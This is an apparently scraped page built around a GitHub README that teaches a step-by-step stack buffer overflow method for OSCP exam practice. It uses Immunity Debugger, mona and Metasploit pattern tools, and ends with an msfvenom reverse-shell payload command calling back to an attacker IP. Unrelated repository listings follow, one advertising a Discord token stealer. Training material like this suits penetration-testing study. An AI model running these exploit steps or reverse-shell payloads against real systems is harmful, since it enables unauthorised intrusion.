This is a walkthrough about understanding the #BoF machine present in the #OSCP exam.

Overview

Buffer Overflow methodology

GitHub Repo stars GitHub last commit (branch) GitHub

Python 3 GitHub Workflow Status

Twitter Follow

Introduction

These are 7 simple python scripts and a methodology to ease (not automate !) the exploitation. Each script targets a phase of the exploitation :

  1. Trigger the BoF (this is facultative for OSCP since they give you a code snippet)
  2. Find the EIP offset
  3. Confirm the offset
  4. Find the badchars
  5. Confirm badchars + find JMP ESP instruction
  6. Confirm code execution (pop calc)
  7. Exploit host

It's based on the do stack buffer overflow good" project (BTW, it's awesomely explained).

How to use

Follow each step and you'll be able to craft a working example of a BoF exploitation.

All the specific variable are stored in 1 single resource file, to avoid any confusion during the exam.

After each step, fill the proper variables with values found and they'll be re-used for the next step

Note: If after each debug operation performed, the application has become unresponsive; Immunity Debugger should be closed first, then the "vulnapp.exe" application should be restarted, and Attach and Run should be done on Immunity Debugger.

0. Pre-start

Fill in the following variables in the resource file depending on the host to attack :

  • RHOST : the IP address of the host
  • RPORT : the port on which to access the application to exploit

1. Segmentation fault : 1_segfault.py

Send enough length string for victim system crash.

Please note that the total length to input is often given in the exmaple they provide in the exam.

Note the offeset in PARAMETERS.py, in the variable offset_eip.

2. Find the offset : 2_find_offset.py

Generate the pattern (adapt the buffer lenght) :

/usr/share/metasploit-framework/tools/exploit/pattern_create.rb -l <String_Length>

buf += ("<PATTERN>")

Put the output into the variable buf in 2_find_offset.py & send it.

Once the app crashes, note down the value of the EIP register (which is the address of the next operation to be executed).

If needed : convert the EIP value to ASCII : echo "<EIP_value>" | xxd -r -p

Find the offset at which the sequence is met in the pattern :

/usr/share/metasploit-framework/tools/exploit/pattern_offset.rb -q <EIP_value>

Or, type this in Immunity Debugger : !mona findmsp.

Note the value of the EIP offet in the variable offset_eip in PARAMETERS.py, and the value of the ESP offset in the variable offset_esp.

3. Control the EIP : 3_confirm_offset.py

Execute this script as is.

In Immunity Debugger, make sure that

  • BBBB in the EIP (in hex, so 42424242)
  • CCCCDDDDD..... is written in what ESP points to

4. Find the bad chars : 4_find_badchars.py

Send it to the application

In Immunity Debugger, make mona create a list of badchars :

!mona bytearray –cpb “\x00”

The console output will tell you where it has been saved.

Compare this file with the stack contents :

!mona compare -a ESP -f <file_with_bad_chars>
!mona compare -a <WHATEVER ADDRESS> -f <file_with_bad_chars>

**Note: **always use the full path to the file !

In the mona output, Possibly bad chars are output. Put them in the badchars array in PARAMETERS.py.

5. Confirm badchars & find a JMP ESP instruction : 5_find_jmp_esp.py

a. Confirm badchars

Make sure the badchars identified are mentionned in the PARAMETERS.py file.

Execute the script.

Re-generate a badchar sequence on mona :

!mona bytearray -cpb "\x00\x04\x05\xA2\xA3\xAC\xAD\xC0\xC1\xEF\xF0"

The console output will tell you where it has been saved.

Compare the bytearray.bin (use the full filepath) and the buffer to make sure they are the same. That will mean that no new badchar have been detected :

!mona compare -a ESP -f <file_with_bad_chars>
!mona compare -a <WHATEVER ADDRESS> -f <file_with_bad_chars>

The mona output status should be unmodified and you should get a message in the console saying : !!! Hooray, normal shellcode unmodified !!!

This mean that no other badchars have been detected.

b. Find a JMP ESP

Ask mona to find the instruction JMP ESP that will allow the processor to execute whatever we have put in the stack.

!mona jmp -r esp -cpb "<bad_chars>"       formatted like this : "\x00\x01"

Put the address returned in the variable ptr_jmp_esp in PARAMETERS.py

6. Pop calc : 6_pop_calc.py

This will confirm the code execution on the target host. This can be used to validate the build-up of the exploit, and set a working basis.

Launch this to produce the shellcode that will make calc pop on the target :

msfvenom -p windows/exec -b '<badchars>' -f python --var-name shellcode_calc \
CMD=calc.exe EXITFUNC=thread

Insert the output (python variable shellcode_calc) in the script 6_pop_calc.py.

In the script, we will also move ESP up in the stack (instruction SUB ESP,0x10) This is to avoid the ESP overwrite by the encoder of the payload. Some guys use a NOP sled, here is a more proper way ;)

Launch the script and enjoy popping calc!

7. Create shellcode : 7_exploit.py

Now, you can craft any other shellcode as long as you respect the badchars :

msfvenom -p windows/shell_reverse_tcp LHOST=<Attacker_IP> LPORT=<Attacker_Port> \
-f py -b '<badchars>' -e x86/shikata_ga_nai -var-name shellcode

Insert the output (python variable shellcode_calc) in the script 7_exploit.py.

Owner
3isenHeiM
Just a pentester knowing some python/bash, trying to make his life smarter ;) Also an Linux/CyberSec/CTF lover
3isenHeiM
This script books automatically a slot on Doctolib in one of the public vaccination centers in Berlin.

BOOKING IN BERLINS VACCINATION CENTERS This python script books automatically a slot on Doctolib in one of the public vaccination centers in Berlin. T

17 Jan 13, 2022
Collaboration with Microsoft, AWS, Google, and ETHZürich Analytics Club (2022 Datathon Project)

DATATHON_ Collaboration with Microsoft, AWS, Google, and ETHZürich Analytics Club (2022 Datathon Project) Datathon Original Challenge SAV DataDays Rei

esthi 34 Nov 10, 2022
Kakatua discord music bot

Donate Ayo donasi! Lokal Internasional Ucapan Terima Kasih Tentu saja, donatur Bunga dan talent-talent h!mawari. Semoga rezeki teman-teman semakin lan

1 Oct 30, 2021
Update your World of Warcraft AddOns hosted on GitHub

AddOns Update Tool Tool to update World of Warcraft AddOns hosted on GitHub Features Pure Python: only Dulwich and Colorlog Multithreaded tasks Manual

Mr. Alchemist 16 Dec 06, 2022
企业微信消息推送的python封装接口,让你轻松用python实现对企业微信的消息推送

👋 corpwechat-bot是一个python封装的企业机器人&应用消息推送库,通过企业微信提供的api实现。 利用本库,你可以轻松地实现从服务器端发送一条文本、图片、视频、markdown等等消息到你的微信手机端,而不依赖于其他的第三方应用,如ServerChan。 如果喜欢该项目,记得给个

Chaopeng 161 Jan 06, 2023
This repository contains modules that extend / modify parts of Odoo ERP

Odoo Custom Addons This repository contains addons that extend / modify parts of Odoo ERP. Addons list account_cancel_permission Only shows the button

Daniel Luque 3 Dec 28, 2022
Celestial - a Python regex Discord chatbot who can talk with you.

Celestial a Python regex Discord chat bot who can talk with you. Invite url: https://discord.com/api/oauth2/authorize?client_id=927573556961869825&per

Jirayu Kaewsing 3 Jan 01, 2023
WILSON Cloud Respwnder is a Web Interaction Logger Sending Out Notifications with the ability to serve custom content in order to appropriately respond to client-issued requests.

WILSON Cloud Respwnder What is this? WILSON Cloud Respwnder is a Web Interaction Logger Sending Out Notifications (WILSON) with the ability to serve c

48 Oct 31, 2022
Add Me To Your Group Enjoy With Me. Pyrogram bot. https://t.me/TamilSupport

SongPlayRoBot 3X Fast Telethon Based Bot ⚜ Open Source Bot 👨🏻‍💻 Demo : SongPlayRoBot 💃🏻 Easy To Deploy 🤗 Click Below Image to Deploy DEPLOY Grou

IMVETRI 850 Dec 30, 2022
A light weight Python library for the Spotify Web API

Spotipy A light weight Python library for the Spotify Web API Documentation Spotipy's full documentation is online at Spotipy Documentation. Installat

Paul Lamere 4.2k Jan 06, 2023
A discord bot providing notifications of player activity on a minecraft server.

tos-alert A discord bot providing notifications of player activity on a minecraft server. Setup By default the app does not launch and will crash with

1 Jul 22, 2022
A mass creator for Discord's new channel threads.

discord-thread-flooder A mass creator for Discord's new channel threads. (obv created by https://github.com/imvast) Warning: this may lag ur pc if u h

Vast 6 Nov 04, 2022
A Telegram Bot Plays With Words!!!

TheWordzBot ➠ I Can Turn Text Into Audio ➠ I Can Get Results From Dictionary ➠ I Can Make Google Search For You ➠ I Can Suggest Strong Passwords For Y

RAVEEN KUMAR 8 Feb 28, 2022
Automate UCheck COVID-19 self-assessment form submission

ucheck Automate UCheck COVID-19 self-assessment form submission. Disclaimer ucheck automatically completes the University of Tornto's UCheck COVID-19

Ira Horecka 15 Nov 30, 2022
A Discord token stealer app written in Python 3.

Discord Token Stealer A Discord token stealer app written in Python 3. This version of the grabber only supports Windows. Features No local caching Tr

cankat 45 Jan 03, 2023
Notion API Database Python Implementation

Python Notion Database Notion API Database Python Implementation created only by database from the official Notion API. Installing / Getting started p

minwook 78 Dec 19, 2022
A twitter bot that simply replies with a beautiful screenshot of the tweet, powered by beautify.dhravya.dev

Poet this! Replies with a beautiful screenshot of the tweet, powered by poet.so Installation git clone https://github.com/dhravya/poet-this.git cd po

Dhravya Shah 30 Dec 04, 2022
A python library built on the API of the coderHub.sa, which helps you to fetch the challenges and more

coderHub A python library built on the API of the coderHub.sa, which helps you to fetch the challenges and more Installation • Features • Usage • Lice

TheAwiteb 5 Nov 04, 2022
Financial portfolio optimisation in python, including classical efficient frontier, Black-Litterman, Hierarchical Risk Parity

PyPortfolioOpt has recently been published in the Journal of Open Source Software 🎉 PyPortfolioOpt is a library that implements portfolio optimizatio

Robert Martin 3.2k Jan 02, 2023
Python bindings for BigML.io

BigML Python Bindings BigML makes machine learning easy by taking care of the details required to add data-driven decisions and predictive power to yo

BigML Inc, Machine Learning made easy 271 Dec 27, 2022